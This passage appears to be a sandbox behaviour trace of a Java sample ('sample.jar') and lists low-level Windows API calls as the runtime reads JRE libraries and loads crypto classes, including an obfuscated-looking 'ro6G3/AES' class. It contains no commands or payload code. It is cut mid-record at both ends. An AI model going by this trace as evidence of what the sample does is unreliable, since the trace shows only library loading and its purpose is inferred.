_Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0106.626] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned -1 [0106.626] CreateFileA (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jsse.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0106.626] calloc (_Count=0x1, _Size=0xa8) returned 0x122f9c80 [0106.627] ReadFile (in: hFile=0x2c4, lpBuffer=0x208d980, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208d930, lpOverlapped=0x0 | out: lpBuffer=0x208d980*, lpNumberOfBytesRead=0x208d930*=0x4, lpOverlapped=0x0) returned 1 [0106.631] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x208d960, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208d960*=595679) returned 1 [0106.631] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x9165f, lpNewFilePointer=0x208d730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d730*=595551) returned 1 [0106.631] ReadFile (in: hFile=0x2c4, lpBuffer=0x208d790, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208d700, lpOverlapped=0x0 | out: lpBuffer=0x208d790*, lpNumberOfBytesRead=0x208d700*=0x80, lpOverlapped=0x0) returned 1 [0106.638] strlen (_Str="sun/security/provider/SunEntries.class") returned 0x26 [0106.638] malloc (_Size=0x48) returned 0x1228e190 [0106.638] malloc (_Size=0xa0) returned 0x12324490 [0106.638] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efe94, lpNewFilePointer=0x208cbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbe0*=54460052) returned 1 [0106.638] ReadFile (in: hFile=0x134, lpBuffer=0x12324490, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cbb0, lpOverlapped=0x0 | out: lpBuffer=0x12324490*, lpNumberOfBytesRead=0x208cbb0*=0xa0, lpOverlapped=0x0) returned 1 [0106.638] malloc (_Size=0x27) returned 0x122fa620 [0106.649] strlen (_Str="sun/security/provider/NativePRNG.class") returned 0x26 [0106.650] malloc (_Size=0x48) returned 0x1228e730 [0106.650] malloc (_Size=0xa0) returned 0x12324b70 [0106.650] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efdea, lpNewFilePointer=0x208cb70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb70*=54459882) returned 1 [0106.650] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb40, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208cb40*=0xa0, lpOverlapped=0x0) returned 1 [0106.650] malloc (_Size=0x27) returned 0x122fa5f0 [0106.666] strlen (_Str="java/security/Provider$Service.class") returned 0x24 [0106.666] malloc (_Size=0x48) returned 0x1228e960 [0106.666] malloc (_Size=0xa0) returned 0x12324ac0 [0106.666] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efcdb, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=54459611) returned 1 [0106.666] ReadFile (in: hFile=0x134, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208e310*=0xa0, lpOverlapped=0x0) returned 1 [0106.666] malloc (_Size=0x25) returned 0x122fa5f0 [0106.700] strlen (_Str="java/security/Provider$UString.class") returned 0x24 [0106.700] malloc (_Size=0x48) returned 0x1228e460 [0106.700] malloc (_Size=0xa0) returned 0x12324b70 [0106.700] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efc89, lpNewFilePointer=0x208e2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2d0*=54459529) returned 1 [0106.700] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2a0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208e2a0*=0xa0, lpOverlapped=0x0) returned 1 [0106.700] malloc (_Size=0x25) returned 0x122fa620 [0106.729] strlen (_Str="sun/security/provider/SHA") returned 0x19 [0106.729] strlen (_Str="sun/security/provider/SHA.class") returned 0x1f [0106.729] malloc (_Size=0x48) returned 0x1228ed70 [0106.729] malloc (_Size=0xa0) returned 0x12324ac0 [0106.729] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efc3c, lpNewFilePointer=0x208e940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e940*=54459452) returned 1 [0106.729] ReadFile (in: hFile=0x134, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e910, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208e910*=0xa0, lpOverlapped=0x0) returned 1 [0106.729] malloc (_Size=0x20) returned 0x122fa470 [0106.743] strlen (_Str="java/lang/Integer") returned 0x11 [0106.746] strlen (_Str="ro6G3/AES") returned 0x9 [0106.748] malloc (_Size=0x48) returned 0x1228ec30 [0106.748] malloc (_Size=0xa0) returned 0x12324280 [0106.748] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb06cc, lpNewFilePointer=0x208cf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf70*=722636) returned 1 [0106.748] ReadFile (in: hFile=0x2c0, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf40, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208cf40*=0xa0, lpOverlapped=0x0) returned 1 [0106.748] malloc (_Size=0x10) returned 0x12323190 [0106.749] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x18e, lpNewFilePointer=0x208b190, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b190*=398) returned 1 [0106.749] ReadFile (in: hFile=0x2c0, lpBuffer=0x208b1e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b160, lpOverlapped=0x0 | out: lpBuffer=0x208b1e0*, lpNumberOfBytesRead=0x208b160*=0x1e, lpOverlapped=0x0) returned 1 [0106.749] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x1bb, lpNewFilePointer=0x208b1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1f0*=443) returned 1 [0106.749] ReadFile (in: hFile=0x2c0, lpBuffer=0x208b300, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x208b1c0, lpOverlapped=0x0 | out: lpBuffer=0x208b300*, lpNumberOfBytesRead=0x208b1c0*=0x29a, lpOverlapped=0x0) returned 1 [0106.753] malloc (_Size=0x528) returned 0x12325970 [0106.762] free (_Block=0x12325970) [0106.764] strlen (_Str="java/security/Key") returned 0x11 [0106.764] strlen (_Str="java/security/Key.class") returned 0x17 [0106.764] malloc (_Size=0x48) returned 0x1228eeb0 [0106.764] malloc (_Size=0xa0) returned 0x12324e30 [0106.764] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f0f84, lpNewFilePointer=0x208c320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c320*=54464388) returned 1 [0106.764] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2f0, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208c2f0*=0xa0, lpOverlapped=0x0) returned 1 [0106.764] malloc (_Size=0x18) returned 0x12323750 [0106.773] strlen (_Str="javax/crypto/spec/SecretKeySpec") returned 0x1f [0106.774] strlen (_Str="javax/crypto/spec/SecretKeySpec.class") returned 0x25 [0106.775] _fullpath (in: _FullPath=0x208d740, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _SizeInBytes=0x400 | out: _FullPath="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0106.775] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0106.776] FindFirstFileA (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d600 | out: lpFindFileData=0x208d600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x425b40 [0106.776] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0106.776] strlen (_Str="Program Files") returned 0xd [0106.776] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d600 | out: lpFindFileData=0x208d600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="Java", cAlternateFileName="")) returned 0x425b40 [0106.776] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0106.776] strlen (_Str="Java") returned 0x4 [0106.777] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d600 | out: lpFindFileData=0x208d600*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x426200 [0106.777] FindClose (in: hFindFile=0x426200 | out: hFindFile=0x426200) returned 1 [0106.777] strlen (_Str="jre1.8.0_171") returned 0xc [0106.777] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208d600 | out: lpFindFileData=0x208d600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="lib", cAlternateFileName="")) returned 0x425ba0 [0106.777] FindClose (in: hFindFile=0x425ba0 | out: hFindFile=0x425ba0) returned 1 [0106.777] strlen (_Str="lib") returned 0x3 [0106.778] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", lpFindFileData=0x208d600 | out: lpFindFileData=0x208d600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb45a81e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb45a81e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb45b939, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1c3c3, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="jce.jar", cAlternateFileName="")) returned 0x425c00 [0106.778] FindClose (in: hFindFile=0x425c00 | out: hFindFile=0x425c00) returned 1 [0106.778] strlen (_Str="jce.jar") returned 0x7 [0106.778] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned -1 [0106.778] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0106.778] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned -1 [0106.778] CreateFileA (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jce.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0106.778] calloc (_Count=0x1, _Size=0xa8) returned 0x12324d80 [0106.778] ReadFile (in: hFile=0x2c8, lpBuffer=0x208da20, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208d9d0, lpOverlapped=0x0 | out: lpBuffer=0x208da20*, lpNumberOfBytesRead=0x208d9d0*=0x4, lpOverlapped=0x0) returned 1 [0106.783] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x208da00, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208da00*=115651) returned 1 [0106.783] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1c343, lpNewFilePointer=0x208d7d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7d0*=115523) returned 1 [0106.783] ReadFile (in: hFile=0x2c8, lpBuffer=0x208d830, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208d7a0, lpOverlapped=0x0 | out: lpBuffer=0x208d830*, lpNumberOfBytesRead=0x208d7a0*=0x80, lpOverlapped=0x0) returned 1 [0106.808] strlen (_Str="javax/crypto/Cipher") returned 0x13 [0106.809] strlen (_Str="javax/crypto/Cipher.class") returned 0x19 [0106.809] strlen (_Str="javax/crypto/Cipher.class") returned 0x19 [0106.809] malloc (_Size=0x48) returned 0x1228ed70 [0106.809] malloc (_Size=0xa0) returned 0x12324cd0 [0106.809] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1af4c, lpNewFilePointer=0x208d8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8d0*=110412) returned 1 [0106.809] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d8a0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208d8a0*=0xa0, lpOverlapped=0x0) returned 1 [0106.809] malloc (_Size=0x1a) returned 0x122fa050 [0106.952] strlen (_Str="sun/security/rsa/SunRsaSign") returned 0x1b [0106.953] strlen (_Str="sun/security/rsa/SunRsaSign.class") returned 0x21 [0106.953] strlen (_Str="sun/security/rsa/SunRsaSign.class") returned 0x21 [0106.953] malloc (_Size=0x48) returned 0x1228eb40 [0106.953] malloc (_Size=0xa0) returned 0x12324540 [0106.953] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x8df62, lpNewFilePointer=0x208daa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208daa0*=581474) returned 1 [0106.953] ReadFile (in: hFile=0x2c4, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da70, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208da70*=0xa0, lpOverlapped=0x0) returned 1 [0106.953] malloc (_Size=0x22) returned 0x122fa620 [0106.956] strlen (_Str="sun/security/rsa/SunRsaSignEntries.class") returned 0x28 [0106.956] malloc (_Size=0x48) returned 0x1228eb90 [0106.956] malloc (_Size=0xa0) returned 0x12324330 [0106.956] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df83a, lpNewFilePointer=0x208cb90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb90*=54392890) returned 1 [0106.956] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb60, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208cb60*=0xa0, lpOverlapped=0x0) returned 1 [0106.957] malloc (_Size=0x29) returned 0x122984c0 [0107.033] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x288af3f, lpNewFilePointer=0x208c7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7f0*=42512191) returned 1 [0107.034] ReadFile (in: hFile=0x134, lpBuffer=0x122e21e0, nNumberOfBytesToRead=0xb48, lpNumberOfBytesRead=0x208c7c0, lpOverlapped=0x0 | out: lpBuffer=0x122e21e0*, lpNumberOfBytesRead=0x208c7c0*=0xb48, lpOverlapped=0x0) returned 1 [0107.093] free (_Block=0x122fa470) [0107.093] free (_Block=0x1228ea00) [0107.183] strlen (_Str="sun/security/ec/SunEC") returned 0x15 [0107.186] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0107.186] malloc (_Size=0x74) returned 0x122f7d10 [0107.186] wcscpy (in: _Dest=0x122f7d10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" [0107.186] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", nBufferLength=0x9, lpBuffer=0x208c7e8, lpFilePart=0x208c7e0 | out: lpBuffer="", lpFilePart=0x208c7e0*=0x0) returned 0x35 [0107.186] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunec.jar"), fInfoLevelId=0x0, lpFileInformation=0x208c580 | out: lpFileInformation=0x208c580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ea1c7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ea1c7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa2c8)) returned 1 [0107.187] free (_Block=0x122f7d10) [0107.187] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0107.187] malloc (_Size=0x74) returned 0x122f7590 [0107.187] wcscpy (in: _Dest=0x122f7590, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" [0107.187] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunec.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2cc [0107.187] GetFileTime (in: hFile=0x2cc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208c6e8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208c6e8*(dwLowDateTime=0xeb3ea1c7, dwHighDateTime=0x1d709ec)) returned 1 [0107.187] CloseHandle (hObject=0x2cc) returned 1 [0107.188] free (_Block=0x122f7590) [0107.188] malloc (_Size=0x35) returned 0x12298880 [0107.188] _errno () returned 0x20f6be0 [0107.188] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0107.188] strcpy (in: _Dest=0x208c2a0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" [0107.188] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned -1 [0107.188] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned -1 [0107.188] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0107.188] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned -1 [0107.188] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0107.188] malloc (_Size=0x74) returned 0x122f7a10 [0107.188] wcscpy (in: _Dest=0x122f7a10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" [0107.188] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunec.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0107.189] free (_Block=0x122f7a10) [0107.189] calloc (_Count=0x1, _Size=0xa8) returned 0x123241d0 [0107.189] ReadFile (in: hFile=0x2cc, lpBuffer=0x208c580, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208c530, lpOverlapped=0x0 | out: lpBuffer=0x208c580*, lpNumberOfBytesRead=0x208c530*=0x4, lpOverlapped=0x0) returned 1 [0107.287] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x208c560, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208c560*=41672) returned 1 [0107.287] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xa248, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=41544) returned 1 [0107.287] ReadFile (in: hFile=0x2cc, lpBuffer=0x208c390, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x208c390*, lpNumberOfBytesRead=0x208c300*=0x80, lpOverlapped=0x0) returned 1 [0107.358] malloc (_Size=0x48) returned 0x1228ed20 [0107.358] malloc (_Size=0xa0) returned 0x12324ac0 [0107.358] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xa143, lpNewFilePointer=0x208cfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfc0*=41283) returned 1 [0107.358] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf90, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208cf90*=0xa0, lpOverlapped=0x0) returned 1 [0107.358] malloc (_Size=0x1c) returned 0x122fa500 [0107.359] malloc (_Size=0x48) returned 0x1228ea00 [0107.359] malloc (_Size=0xa0) returned 0x12324cd0 [0107.359] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9ba6, lpNewFilePointer=0x208ce20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce20*=39846) returned 1 [0107.359] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cdf0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208cdf0*=0xa0, lpOverlapped=0x0) returned 1 [0107.359] malloc (_Size=0x15) returned 0x12323510 [0107.360] calloc (_Count=0x1, _Size=0x58) returned 0x122f94f0 [0107.360] malloc (_Size=0x1bf0) returned 0x1231fc00 [0107.360] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x208b050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b050*=0) returned 1 [0107.360] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b020, lpOverlapped=0x0 | out: lpBuffer=0x208b0a0*, lpNumberOfBytesRead=0x208b020*=0x1e, lpOverlapped=0x0) returned 1 [0107.360] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x32, lpNewFilePointer=0x208b0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b0b0*=50) returned 1 [0107.360] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b1c0, nNumberOfBytesToRead=0x33c, lpNumberOfBytesRead=0x208b080, lpOverlapped=0x0 | out: lpBuffer=0x208b1c0*, lpNumberOfBytesRead=0x208b080*=0x33c, lpOverlapped=0x0) returned 1 [0107.361] malloc (_Size=0x8000) returned 0x12d71f70 [0107.373] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x32, lpNewFilePointer=0x208afb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afb0*=50) returned 1 [0107.373] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b0c0, nNumberOfBytesToRead=0x33c, lpNumberOfBytesRead=0x208af80, lpOverlapped=0x0 | out: lpBuffer=0x208b0c0*, lpNumberOfBytesRead=0x208af80*=0x33c, lpOverlapped=0x0) returned 1 [0107.374] malloc (_Size=0x48) returned 0x1228ea50 [0107.374] malloc (_Size=0xa0) returned 0x12324ee0 [0107.374] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9be8, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=39912) returned 1 [0107.374] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324ee0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x12324ee0*, lpNumberOfBytesRead=0x208cd60*=0xa0, lpOverlapped=0x0) returned 1 [0107.374] malloc (_Size=0x15) returned 0x123236d0 [0107.375] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x37e, lpNewFilePointer=0x208af50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af50*=894) returned 1 [0107.375] ReadFile (in: hFile=0x2cc, lpBuffer=0x208afa0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208af20, lpOverlapped=0x0 | out: lpBuffer=0x208afa0*, lpNumberOfBytesRead=0x208af20*=0x1e, lpOverlapped=0x0) returned 1 [0107.375] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x3b0, lpNewFilePointer=0x208afb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afb0*=944) returned 1 [0107.375] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b0c0, nNumberOfBytesToRead=0x30b, lpNumberOfBytesRead=0x208af80, lpOverlapped=0x0 | out: lpBuffer=0x208b0c0*, lpNumberOfBytesRead=0x208af80*=0x30b, lpOverlapped=0x0) returned 1 [0107.378] malloc (_Size=0x48) returned 0x1228e640 [0107.378] malloc (_Size=0xa0) returned 0x12324750 [0107.378] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9c2a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=39978) returned 1 [0107.378] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208cd60*=0xa0, lpOverlapped=0x0) returned 1 [0107.378] malloc (_Size=0x16) returned 0x123230d0 [0107.381] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x6cb, lpNewFilePointer=0x208af50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af50*=1739) returned 1 [0107.381] ReadFile (in: hFile=0x2cc, lpBuffer=0x208afa0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208af20, 